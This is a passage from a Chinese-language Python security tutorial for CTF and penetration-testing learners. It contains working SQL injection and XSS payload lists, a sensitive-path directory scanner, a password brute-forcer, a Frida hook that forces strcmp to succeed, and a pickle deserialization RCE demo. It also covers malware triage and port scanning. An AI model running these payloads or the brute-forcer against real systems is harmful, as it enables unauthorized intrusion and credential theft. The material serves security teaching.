for param_name, original_value in params.items():
for payload in sqli_payloads:
test_params = params.copy()
test_params[param_name] = payload
try:
resp = requests.get(url, params=test_params, timeout=10)
content = resp.text.lower()
# 检查是否出现 SQL 错误
for sig in error_signatures:
if sig.lower() in content:
results.append({
"param": param_name,
"payload": payload,
"type": "error-based",
"signature": sig,
})
break
# 基于布尔差异的检测
if payload in ["' OR '1'='1", "' OR '1'='1' --"]:
true_resp = resp
elif payload in ["' OR '1'='2", "' AND '1'='2'"]:
false_resp = resp
except requests.exceptions.RequestException:
continue
# 布尔盲注检测:比较 true 条件和 false 条件的响应差异
try:
if len(true_resp.text) != len(false_resp.text):
results.append({
"param": param_name,
"type": "boolean-based blind",
"note": f"响应长度差异: true={len(true_resp.text)}, false={len(false_resp.text)}"
})
except:
pass
return results
# ===== SQLMap API 封装 =====
def sqlmap_scan(target_url, level=1, risk=1):
"""调用 SQLMap REST API 进行自动化 SQL 注入扫描"""
import time
api_url = "http://127.0.0.1:8775" # sqlmapapi 默认地址
# 创建任务
task_id = requests.get(f"{api_url}/task/new").json()["taskid"]
# 设置目标
requests.post(f"{api_url}/scan/{task_id}/start",
json={"url": target_url, "level": level, "risk": risk})
# 等待扫描完成
while True:
status = requests.get(f"{api_url}/scan/{task_id}/status").json()
if status["status"] == "terminated":
break
time.sleep(5)
# 获取结果
results = requests.get(f"{api_url}/scan/{task_id}/results").json()
return results
XSS 检测
import requests
from html import escape, unescape
from urllib.parse import urlencode
def detect_xss(url, params):
"""基础反射型 XSS 检测"""
xss_payloads = [
'<script>alert("XSS")</script>',
'<img src=x onerror=alert("XSS")>',
'<svg onload=alert("XSS")>',
'"><script>alert("XSS")</script>',
"';alert('XSS');//",
'<iframe src="javascript:alert(\'XSS\')">',
'<body onload=alert("XSS")>',
'{{7*7}}', # SSTI 检测
'${7*7}', # 表达式注入检测
'<marquee onstart=alert("XSS")>',
]
findings = []
for param_name in params:
for payload in xss_payloads:
test_params = params.copy()
test_params[param_name] = payload
resp = requests.get(url, params=test_params, timeout=10)
# 检查 payload 是否原样出现在响应中(未被转义)
if payload in resp.text:
findings.append({
"param": param_name,
"payload": payload,
"type": "reflected (unescaped)",
})
# 检查部分转义的情况
elif escape(payload) not in resp.text and payload.replace('"', '"') in resp.text:
findings.append({
"param": param_name,
"payload": payload,
"type": "reflected (partial escape)",
})
return findings
目录扫描与信息收集
import requests
from concurrent.futures import ThreadPoolExecutor
def directory_scan(base_url, wordlist, extensions=None, threads=50):
"""Web 目录/文件扫描"""
if extensions is None:
extensions = ["", ".php", ".html", ".txt", ".bak", ".old"]
found = []
def check_path(path):
url = f"{base_url.rstrip('/')}/{path}"
try:
resp = requests.get(url, timeout=5, allow_redirects=False)
if resp.status_code not in [404, 403]:
return (url, resp.status_code, len(resp.text))
except:
pass
return None
# 生成候选路径
candidates = []
for word in wordlist:
for ext in extensions:
candidates.append(f"{word}{ext}")
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = {executor.submit(check_path, path): path for path in candidates}
for future in futures:
result = future.result()
if result:
url, status, size = result
print(f"[{status}] {url} ({size} bytes)")
found.append(result)
return found
# 常见敏感路径
common_paths = [
"robots.txt", ".git/HEAD", ".env", ".htaccess", "wp-config.php.bak",
"backup.sql", "phpinfo.php", ".svn/entries", "server-status",
"admin/", "api/", "debug/", "config/", ".DS_Store", "web.config",
]
# directory_scan("http://target.com", common_paths)
密码爆破
import requests
import itertools
import string
from concurrent.futures import ThreadPoolExecutor
def brute_force_login(url, username, password_field, username_field,
wordlist, method="POST", fail_pattern="Invalid"):
"""基于字典的密码爆破"""
found = []
def try_password(password):
data = {username_field: username, password_field: password}
try:
if method.upper() == "POST":
resp = requests.post(url, data=data, timeout=10,
allow_redirects=False)
else:
resp = requests.get(url, params=data, timeout=10,
allow_redirects=False)
# 根据响应判断是否成功
if fail_pattern.lower() not in resp.text.lower():
if resp.status_code in [200, 301, 302]:
return (username, password, resp.status_code)
except:
pass
return None
with ThreadPoolExecutor(max_workers=10) as executor:
futures = {executor.submit(try_password, pw): pw for pw in wordlist}
for future in futures:
result = future.result()
if result:
print(f"[+] 成功: {result[0]}:{result[1]} (HTTP {result[2]})")
found.append(result)
return found
def generate_passwords(min_len=4, max_len=6, charset=None):
"""生成暴力破解密码字典"""
if charset is None:
charset = string.ascii_lowercase + string.digits
for length in range(min_len, max_len + 1):
for combo in itertools.product(charset, repeat=length):
yield ''.join(combo)
五、逆向工程辅助
字节模式搜索(YARA 风格)
import re
def search_bytes(data, pattern):
"""
在二进制数据中搜索字节模式
pattern: 十六进制字符串,支持 ?? 作为通配符
例: "48 89 e5 ?? ?? ?? 48 83 ec"
"""
# 将模式转换为正则表达式
regex_pattern = ""
for byte in pattern.split():
if byte == "??":
regex_pattern += "."
else:
regex_pattern += "\\x" + byte
matches = []
for match in re.finditer(regex_pattern.encode(), data):
matches.append(match.start())
print(f"[+] 匹配于偏移 0x{match.start():08X}: "
f"{data[match.start():match.start()+16].hex()}")
return matches
# 示例:搜索 x86 函数序言 (push rbp; mov rbp, rsp)
# push rbp = 55, mov rbp rsp = 48 89 e5
# search_bytes(binary_data, "55 48 89 e5")
# ===== 特征码提取 =====
def extract_unique_strings(filepath, min_length=4):
"""从二进制文件中提取可打印字符串"""
import string
with open(filepath, 'rb') as f:
data = f.read()
printable = set(string.printable.encode())
strings = []
current = b""
for byte in data:
if bytes([byte]) in printable and byte != 0:
current += bytes([byte])
else:
if len(current) >= min_length:
strings.append(current.decode('ascii', errors='ignore'))
current = b""
# 去重并排序
unique = sorted(set(strings))
# 分类
urls = [s for s in unique if s.startswith(('http://', 'https://'))]
ips = [s for s in unique if re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', s)]
emails = [s for s in unique if '@' in s and '.' in s.split('@')[-1]]
print(f"提取到 {len(unique)} 个字符串")
print(f" URL: {len(urls)}")
print(f" IP: {len(ips)}")
print(f" Email: {len(emails)}")
return unique
Frida:动态插桩
Frida 是一个动态二进制插桩工具,可以在运行时 hook 函数、修改行为。
# pip install frida-tools frida
import frida
def hook_function(process_name, function_name, module_name=None):
"""Hook 目标进程中的函数"""
# Frida JavaScript 脚本
js_code = f"""
Interceptor.attach(Module.findExportByName("{module_name || 'null'}", "{function_name}"), {{
onEnter: function(args) {{
console.log("[+] {function_name} called");
// 读取参数
// console.log("arg0: " + args[0].readUtf8String());
// console.log("arg1: " + args[1].toInt32());
}},
onLeave: function(retval) {{
console.log("[+] {function_name} returned: " + retval);
// 修改返回值
// retval.replace(ptr(0x1));
}}
}});
"""
# 附加到进程
session = frida.attach(process_name)
# 注入脚本
script = session.create_script(js_code)
script.on('message', lambda message, data: print(f"[*] {message}"))
script.load()
print(f"[*] 已 Hook {function_name},按 Ctrl+C 退出")
try:
import sys
sys.stdin.read()
except KeyboardInterrupt:
session.detach()
# Frida 内联 Hook 示例:修改函数行为
inline_hook_js = """
Interceptor.attach(Module.findExportByName(null, "strcmp"), {
onEnter: function(args) {
this.s1 = args[0].readUtf8String();
this.s2 = args[1].readUtf8String();
},
onLeave: function(retval) {
// 让 strcmp 始终返回 0(相等)
if (this.s1 === "admin" || this.s2 === "admin") {
console.log("[*] strcmp('" + this.s1 + "', '" + this.s2 + "') -> forced 0");
retval.replace(0);
}
}
});
"""
六、取证与恶意软件分析
文件类型识别
import magic # pip install python-magic (Linux) / python-magic-bin (Windows)
def identify_file(filepath):
"""识别文件真实类型(不依赖扩展名)"""
# MIME 类型
mime = magic.Magic(mime=True)
file_type = mime.from_file(filepath)
print(f"MIME 类型: {file_type}")
# 详细描述
desc = magic.Magic()
description = desc.from_file(filepath)
print(f"描述: {description}")
# 常见文件魔数
MAGIC_BYTES = {
b'\x7fELF': 'ELF 可执行文件',
b'MZ': 'PE 可执行文件 (Windows)',
b'\x89PNG': 'PNG 图片',
b'\xff\xd8\xff': 'JPEG 图片',
b'GIF8': 'GIF 图片',
b'PK\x03\x04': 'ZIP 压缩包 / Office 文档',
b'Rar!\x1a\x07': 'RAR 压缩包',
b'\x1f\x8b': 'GZIP 压缩包',
b'%PDF': 'PDF 文档',
b'\xca\xfe\xba\xbe': 'Mach-O / Java Class',
b'BZ': 'BZIP2 压缩包',
}
with open(filepath, 'rb') as f:
header = f.read(16)
for magic_bytes, desc in MAGIC_BYTES.items():
if header.startswith(magic_bytes):
print(f"魔数匹配: {desc}")
break
return file_type, description
def file_hash_all(filepath):
"""计算文件的多种哈希"""
import hashlib
hashers = {
'MD5': hashlib.md5(),
'SHA1': hashlib.sha1(),
'SHA256': hashlib.sha256(),
'SHA512': hashlib.sha512(),
}
with open(filepath, 'rb') as f:
while chunk := f.read(8192):
for h in hashers.values():
h.update(chunk)
results = {}
for name, h in hashers.items():
digest = h.hexdigest()
results[name] = digest
print(f"{name}: {digest}")
return results
VirusTotal 查询
import requests
class VirusTotalAPI:
"""VirusTotal API 封装(v3)"""
BASE_URL = "https://www.virustotal.com/api/v3"
def __init__(self, api_key):
self.headers = {"x-apikey": api_key}
def search_hash(self, file_hash):
"""通过哈希查询文件扫描结果"""
resp = requests.get(
f"{self.BASE_URL}/files/{file_hash}",
headers=self.headers
)
if resp.status_code == 200:
data = resp.json()
attrs = data["data"]["attributes"]
stats = attrs["last_analysis_stats"]
print(f"文件名: {attrs.get('meaningful_name', 'N/A')}")
print(f"类型: {attrs.get('type_description', 'N/A')}")
print(f"大小: {attrs.get('size', 'N/A')} bytes")
print(f"首次提交: {attrs.get('first_submission_date', 'N/A')}")
print(f"检测结果: 恶意={stats['malicious']}, "
f"可疑={stats['suspicious']}, "
f"无害={stats['harmless']}, "
f"未检测={stats['undetected']}")
return data
elif resp.status_code == 404:
print("该哈希在 VirusTotal 中无记录")
return None
def search_ip(self, ip):
"""查询 IP 地址的威胁情报"""
resp = requests.get(
f"{self.BASE_URL}/ip_addresses/{ip}",
headers=self.headers
)
if resp.status_code == 200:
data = resp.json()
attrs = data["data"]["attributes"]
print(f"IP: {ip}")
print(f"国家: {attrs.get('country', 'N/A')}")
print(f"AS号: {attrs.get('asn', 'N/A')}")
print(f"所有者: {attrs.get('as_owner', 'N/A')}")
stats = attrs.get("last_analysis_stats", {})
print(f"恶意评分: {stats.get('malicious', 0)}")
return data
return None
# 使用示例:
# vt = VirusTotalAPI("your-api-key")
# vt.search_hash("44d88612fea8a8f36de82e1278abb02f")
# vt.search_ip("8.8.8.8")
简易 PE 恶意行为分析
def analyze_suspicious_pe(filepath):
"""静态分析 PE 文件中的可疑行为特征"""
import pefile
pe = pefile.PE(filepath)
findings = []
# 检查导入函数(高危 API)
dangerous_apis = {
# 进程操作
"CreateRemoteThread": "进程注入",
"VirtualAllocEx": "远程内存分配",
"WriteProcessMemory": "远程内存写入",
"NtUnmapViewOfSection": "进程掏空(Process Hollowing)",
"QueueUserAPC": "APC 注入",
# 网络通信
"URLDownloadToFile": "下载文件",
"InternetOpenUrl": "网络请求",
"WinHttpOpen": "HTTP 通信",
"WSAStartup": "Winsock 初始化",
# 持久化
"RegSetValueEx": "注册表写入",
"RegCreateKeyEx": "注册表创建",
"CreateService": "创建系统服务",
# 反检测
"IsDebuggerPresent": "调试器检测",
"CheckRemoteDebuggerPresent": "远程调试器检测",
"NtQueryInformationProcess": "进程信息查询(反调试)",
"GetTickCount": "时间检测(反调试)",
# 信息收集
"GetAsyncKeyState": "键盘记录",
"SetWindowsHookEx": "键盘/鼠标 Hook",
"OpenClipboard": "剪贴板访问",
# 文件操作
"MoveFileEx": "文件移动(可作删除)",
"DeleteFileA": "文件删除",
"CopyFileA": "文件复制",
# 权限提升
"AdjustTokenPrivileges": "权限提升",
"OpenProcessToken": "令牌操作",
"ShellExecute": "执行程序",
}
if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
for entry in pe.DIRECTORY_ENTRY_IMPORT:
for imp in entry.imports:
if imp.name:
func_name = imp.name.decode()
if func_name in dangerous_apis:
findings.append({
"function": func_name,
"dll": entry.dll.decode(),
"threat": dangerous_apis[func_name],
})
# 检查可疑节区名
suspicious_sections = [".upx", "UPX0", "UPX1", ".aspack", ".adata"]
for section in pe.sections:
name = section.Name.decode().rstrip('\x00')
if name in suspicious_sections:
findings.append({
"type": "packer",
"detail": f"可疑节区名: {name}(可能被加壳)",
})
# 检查高熵值(可能是加密或压缩)
import math
for section in pe.sections:
data = section.get_data()
if len(data) == 0:
continue
byte_counts = [0] * 256
for byte in data:
byte_counts[byte] += 1
entropy = -sum(
(c / len(data)) * math.log2(c / len(data))
for c in byte_counts if c > 0
)
if entropy > 7.0:
name = section.Name.decode().rstrip('\x00')
findings.append({
"type": "high_entropy",
"detail": f"节区 {name} 熵值 {entropy:.2f}(可能含加密/压缩数据)",
})
# 输出报告
if findings:
print(f"[!] 发现 {len(findings)} 个可疑特征:")
for f in findings:
if "threat" in f:
print(f" [API] {f['function']} ({f['dll']}) → {f['threat']}")
else:
print(f" [{f['type']}] {f['detail']}")
else:
print("[+] 未发现明显可疑特征")
return findings
七、网络协议分析
解析常见协议
import struct
def parse_ethernet_header(packet):
"""解析以太网帧头"""
dst_mac = packet[0:6].hex(':')
src_mac = packet[6:12].hex(':')
eth_type = struct.unpack('!H', packet[12:14])[0]
type_names = {0x0800: "IPv4", 0x0806: "ARP", 0x86DD: "IPv6"}
print(f" 目的 MAC: {dst_mac}")
print(f" 源 MAC: {src_mac}")
print(f" 类型: 0x{eth_type:04X} ({type_names.get(eth_type, 'Unknown')})")
return eth_type, packet[14:]
def parse_ipv4_header(packet):
"""解析 IPv4 头"""
version_ihl = packet[0]
version = version_ihl >> 4
ihl = (version_ihl & 0x0F) * 4 # 头部长度(字节)
ttl = packet[8]
protocol = packet[9]
src_ip = '.'.join(str(b) for b in packet[12:16])
dst_ip = '.'.join(str(b) for b in packet[16:20])
proto_names = {1: "ICMP", 6: "TCP", 17: "UDP"}
print(f" IPv{version}, 头长={ihl}B, TTL={ttl}")
print(f" 协议: {protocol} ({proto_names.get(protocol, 'Unknown')})")
print(f" 源 IP: {src_ip}")
print(f" 目的 IP: {dst_ip}")
return protocol, ihl, packet[ihl:]
def parse_tcp_header(packet):
"""解析 TCP 头"""
src_port, dst_port = struct.unpack('!HH', packet[0:4])
seq_num = struct.unpack('!I', packet[4:8])[0]
ack_num = struct.unpack('!I', packet[8:12])[0]
data_offset = ((packet[12] >> 4) & 0x0F) * 4
flags = packet[13]
flag_names = []
if flags & 0x01: flag_names.append("FIN")
if flags & 0x02: flag_names.append("SYN")
if flags & 0x04: flag_names.append("RST")
if flags & 0x08: flag_names.append("PSH")
if flags & 0x10: flag_names.append("ACK")
if flags & 0x20: flag_names.append("URG")
print(f" {src_port} → {dst_port}")
print(f" Seq={seq_num}, Ack={ack_num}")
print(f" Flags: [{', '.join(flag_names)}]")
payload = packet[data_offset:]
return src_port, dst_port, payload
DNS 解析与重绑定检测
import socket
import struct
def resolve_dns(domain, dns_server="8.8.8.8"):
"""手动构造并发送 DNS 查询"""
# DNS Header
header = struct.pack('>HHHHHH', 0xAAAA, 0x0100, 1, 0, 0, 0)
# Question
question = b''
for label in domain.split('.'):
question += struct.pack('B', len(label)) + label.encode()
question += b'\x00\x00\x01\x00\x01' # QTYPE=A, QCLASS=IN
packet = header + question
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.settimeout(5)
s.sendto(packet, (dns_server, 53))
response, _ = s.recvfrom(4096)
# 解析响应
an_count = struct.unpack('>H', response[6:8])[0]
answers = []
offset = len(header) + len(question)
for _ in range(an_count):
# 跳过 name(压缩指针或标签)
if response[offset] & 0xC0 == 0xC0:
offset += 2
else:
while response[offset] != 0:
offset += response[offset] + 1
offset += 1
rtype, rclass, ttl, rdlength = struct.unpack('>HHIH', response[offset:offset+10])
offset += 10
if rtype == 1: # A 记录
ip = '.'.join(str(b) for b in response[offset:offset+rdlength])
answers.append({"type": "A", "ip": ip, "ttl": ttl})
print(f" A 记录: {ip} (TTL={ttl})")
offset += rdlength
return answers
八、自动化与工具开发
命令行参数解析
import argparse
def build_scanner_cli():
"""构建安全扫描器命令行工具"""
parser = argparse.ArgumentParser(
description="PyScanner - Python 安全扫描工具",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
示例:
%(prog)s -t 192.168.1.1 -p 1-1000 --threads 100
%(prog)s -t example.com -p 80,443,8080 --service-detect
%(prog)s -u http://example.com --wordlist common.txt
"""
)
# 目标参数
target = parser.add_argument_group("目标")
target.add_argument("-t", "--target", required=True, help="目标 IP 或域名")
target.add_argument("-p", "--ports", default="1-1024",
help="端口范围 (默认: 1-1024)")
target.add_argument("-u", "--url", help="目标 URL (Web 扫描模式)")
# 扫描选项
scan = parser.add_argument_group("扫描选项")
scan.add_argument("--threads", type=int, default=50, help="线程数 (默认: 50)")
scan.add_argument("--timeout", type=float, default=2.0, help="超时秒数 (默认: 2.0)")
scan.add_argument("--service-detect", action="store_true", help="启用服务识别")
scan.add_argument("--wordlist", help="Web 目录爆破字典文件")
# 输出选项
output = parser.add_argument_group("输出选项")
output.add_argument("-o", "--output", help="输出文件路径")
output.add_argument("-v", "--verbose", action="store_true", help="详细输出")
output.add_argument("-q", "--quiet", action="store_true", help="静默模式")
args = parser.parse_args()
# 解析端口范围
if '-' in args.ports:
start, end = args.ports.split('-')
args.port_list = list(range(int(start), int(end) + 1))
elif ',' in args.ports:
args.port_list = [int(p) for p in args.ports.split(',')]
else:
args.port_list = [int(args.ports)]
return args
# python scanner.py -t 192.168.1.1 -p 80,443,8080 --threads 100 -v
并发与异步
import asyncio
import aiohttp # pip install aiohttp
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor
# ===== 异步 HTTP 批量请求(高性能扫描)=====
async def async_fetch(session, url, timeout=5):
"""异步 HTTP 请求"""
try:
async with session.get(url, timeout=timeout, ssl=False) as resp:
return url, resp.status, len(await resp.read())
except Exception:
return url, -1, 0
async def async_scan(urls, concurrency=100):
"""异步批量扫描"""
connector = aiohttp.TCPConnector(limit=concurrency)
async with aiohttp.ClientSession(connector=connector) as session:
tasks = [async_fetch(session, url) for url in urls]
results = await asyncio.gather(*tasks, return_exceptions=True)
for result in results:
if isinstance(result, tuple):
url, status, size = result
if status > 0:
print(f"[{status}] {url} ({size} bytes)")
return results
# 运行异步扫描
# urls = [f"http://192.168.1.{i}" for i in range(1, 255)]
# asyncio.run(async_scan(urls))
# ===== 多进程(CPU 密集型任务,如哈希计算)=====
def compute_hashes(filepath):
"""多进程计算文件哈希"""
import hashlib
def hash_chunk(args):
chunk, offset = args
h = hashlib.sha256(chunk).hexdigest()
return offset, h
chunks = []
with open(filepath, 'rb') as f:
offset = 0
while chunk := f.read(1024 * 1024): # 1MB 块
chunks.append((chunk, offset))
offset += len(chunk)
with ProcessPoolExecutor() as executor:
results = executor.map(hash_chunk, chunks)
return sorted(results, key=lambda x: x[0])
日志与报告生成
import logging
import json
from datetime import datetime
# ===== 结构化日志 =====
def setup_logging(log_file="scan.log", verbose=False):
"""配置安全扫描日志"""
logger = logging.getLogger("scanner")
logger.setLevel(logging.DEBUG if verbose else logging.INFO)
# 文件输出
fh = logging.FileHandler(log_file, encoding='utf-8')
fh.setLevel(logging.DEBUG)
# 控制台输出
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG if verbose else logging.INFO)
formatter = logging.Formatter(
'%(asctime)s [%(levelname)s] %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
return logger
# ===== JSON 报告 =====
class ScanReport:
"""扫描报告生成器"""
def __init__(self, target):
self.target = target
self.start_time = datetime.now().isoformat()
self.findings = []
def add_finding(self, category, severity, detail):
self.findings.append({
"category": category,
"severity": severity, # critical / high / medium / low / info
"detail": detail,
"timestamp": datetime.now().isoformat(),
})
def to_json(self, filepath=None):
report = {
"target": self.target,
"scan_time": self.start_time,
"total_findings": len(self.findings),
"by_severity": {},
"findings": self.findings,
}
# 按严重性统计
for f in self.findings:
sev = f["severity"]
report["by_severity"][sev] = report["by_severity"].get(sev, 0) + 1
json_str = json.dumps(report, indent=2, ensure_ascii=False)
if filepath:
with open(filepath, 'w', encoding='utf-8') as f:
f.write(json_str)
print(f"[*] 报告已保存至 {filepath}")
return json_str
# 使用示例:
# report = ScanReport("192.168.1.1")
# report.add_finding("open_port", "info", "Port 80/tcp open (HTTP)")
# report.add_finding("vuln", "high", "SQL Injection in /login parameter 'username'")
# report.to_json("scan_report.json")
九、常用安全 Python 库速查
| 库 | 安装 | 用途 |
|---|---|---|
requests |
pip install requests |
HTTP 请求,Web 安全基础 |
pwntools |
pip install pwntools |
CTF 与漏洞利用开发 |
scapy |
pip install scapy |
数据包构造与嗅探 |
pycryptodome |
pip install pycryptodome |
密码学(AES, RSA, SHA 等) |
capstone |
pip install capstone |
多架构反汇编引擎 |
keystone |
pip install keystone-engine |
多架构汇编引擎 |
unicorn |
pip install unicorn |
CPU 模拟器(执行 shellcode) |
angr |
pip install angr |
符号执行与二进制分析 |
pefile |
pip install pefile |
PE 文件解析 |
lief |
pip install lief |
ELF/PE/Mach-O 解析 |
frida |
pip install frida-tools |
动态二进制插桩 |
ropper |
pip install ropper |
ROP gadget 搜索 |
aiohttp |
pip install aiohttp |
异步 HTTP(高性能扫描) |
paramiko |
pip install paramiko |
SSH 协议客户端 |
impacket |
pip install impacket |
Windows 协议套件(SMB, Kerberos 等) |
yara-python |
pip install yara-python |
恶意软件特征匹配 |
volatility3 |
pip install volatility3 |
内存取证分析 |
beautifulsoup4 |
pip install beautifulsoup4 |
HTML 解析 |
selenium |
pip install selenium |
浏览器自动化(XSS 测试等) |
flask |
pip install flask |
快速搭建 CTF 靶场或 Web 服务 |
mitmproxy |
pip install mitmproxy |
中间人代理与流量分析 |
十、实战模板:一个完整的端口扫描器
将上述知识整合为一个可用的安全工具。
#!/usr/bin/env python3
"""
PyPortScan - 一个简洁的端口扫描器
用法: python scanner.py <target> [ports] [--threads N]
"""
import socket
import argparse
import time
import json
from concurrent.futures import ThreadPoolExecutor, as_completed
class PortScanner:
def __init__(self, target, timeout=2, threads=100):
self.target = target
self.timeout = timeout
self.threads = threads
self.results = []
# 解析目标
try:
self.ip = socket.gethostbyname(target)
print(f"[*] 目标: {target} ({self.ip})")
except socket.gaierror:
print(f"[!] 无法解析: {target}")
raise
def scan_port(self, port):
"""扫描单个端口"""
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(self.timeout)
result = s.connect_ex((self.ip, port))
if result == 0:
# 尝试获取服务名
try:
service = socket.getservbyport(port)
except OSError:
service = "unknown"
# 尝试抓 banner
banner = self._grab_banner(port)
return {"port": port, "state": "open",
"service": service, "banner": banner}
except:
pass
return None
def _grab_banner(self, port):
"""尝试获取服务 banner"""
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(2)
s.connect((self.ip, port))
s.send(b"HEAD / HTTP/1.1\r\nHost: test\r\n\r\n")
banner = s.recv(1024).decode(errors='ignore').strip()
return banner[:200]
except:
return ""
def scan(self, ports):
"""多线程扫描"""
print(f"[*] 扫描 {len(ports)} 个端口 (线程数: {self.threads})")
start = time.time()
with ThreadPoolExecutor(max_workers=self.threads) as executor:
futures = {executor.submit(self.scan_port, port): port
for port in ports}
for future in as_completed(futures):
result = future.result()
if result:
self.results.append(result)
port = result["port"]
svc = result["service"]
banner = result["banner"][:50] if result["banner"] else ""
line = f"[+] {port}/tcp OPEN {svc}"
if banner:
line += f" ({banner})"
print(line)
elapsed = time.time() - start
self.results.sort(key=lambda x: x["port"])
print(f"\n[*] 扫描完成: {len(self.results)} 个开放端口, 耗时 {elapsed:.2f}s")
return self.results
def export_json(self, filepath):
"""导出 JSON 报告"""
report = {
"target": self.target,
"ip": self.ip,
"scan_time": time.strftime("%Y-%m-%d %H:%M:%S"),
"open_ports": self.results,
}
with open(filepath, 'w') as f:
json.dump(report, f, indent=2)
print(f"[*] 报告已保存至 {filepath}")
def parse_ports(port_str):
"""解析端口参数: '80', '80,443', '1-1024' """
ports = set()
for part in port_str.split(','):
if '-' in part:
start, end = part.split('-')
ports.update(range(int(start), int(end) + 1))
else:
ports.add(int(part))
return sorted(ports)
def main():
parser = argparse.ArgumentParser(description="PyPortScan 端口扫描器")
parser.add_argument("target", help="目标 IP 或域名")
parser.add_argument("ports", nargs="?", default="1-1024",
help="端口范围 (默认: 1-1024)")
parser.add_argument("--threads", type=int, default=100, help="线程数")
parser.add_argument("--timeout", type=float, default=2.0, help="超时秒数")
parser.add_argument("-o", "--output", help="输出 JSON 报告路径")
args = parser.parse_args()
ports = parse_ports(args.ports)
scanner = PortScanner(args.target, args.timeout, args.threads)
scanner.scan(ports)
if args.output:
scanner.export_json(args.output)
if __name__ == "__main__":
main()
# 用法示例:
# python scanner.py 192.168.1.1 22,80,443,3306,8080 --threads 50
# python scanner.py scanme.nmap.org 1-1000 -o report.json
附录:CTF 中的 Python 小技巧
# ===== 快速 Base64 解码 =====
import base64
data = base64.b64decode("SGVsbG8gV29ybGQ=")
# ===== 异或解密 =====
def xor_decrypt(data, key):
return bytes([b ^ key[i % len(key)] for i, b in enumerate(data)])
# ===== 字节转整数(大端/小端)=====
int.from_bytes(b'\x01\x02\x03\x04', 'big') # 0x01020304
int.from_bytes(b'\x01\x02\x03\x04', 'little') # 0x04030201
# ===== 快速求最大公约数与模逆 =====
from math import gcd
def mod_inverse(a, m):
"""扩展欧几里得算法求模逆: a * x ≡ 1 (mod m)"""
if gcd(a, m) != 1:
return None
return pow(a, -1, m) # Python 3.8+ 内置支持
# ===== 快速因式分解(小整数)=====
def factorize(n):
"""试除法因式分解"""
factors = []
d = 2
while d * d <= n:
while n % d == 0:
factors.append(d)
n //= d
d += 1
if n > 1:
factors.append(n)
return factors
# ===== Python 反序列化漏洞演示 =====
# 警告: pickle 反序列化不可信数据是极其危险的!
import pickle
import os
class ExploitPayload:
"""恶意 pickle 载荷(仅用于演示,切勿用于非法用途)"""
def __reduce__(self):
# 当 pickle.loads() 执行时,会调用 os.system("id")
return (os.system, ("id",))
# payload = pickle.dumps(ExploitPayload())
# pickle.loads(payload) # 执行 os.system("id") — 远程代码执行!
# 防御:永远不要 pickle.loads() 不可信数据
# 安全替代:json, msgpack, protobuf
2026.05.11
进一步学习
- CTF Wiki — 中文 CTF 知识库
- Hack The Box — 在线渗透测试练习平台
- OverTheWire — Linux 安全 Wargames
- Pwnable.kr — 二进制漏洞利用练习
- CryptoHack — 密码学挑战平台
- OWASP — Web 应用安全标准与工具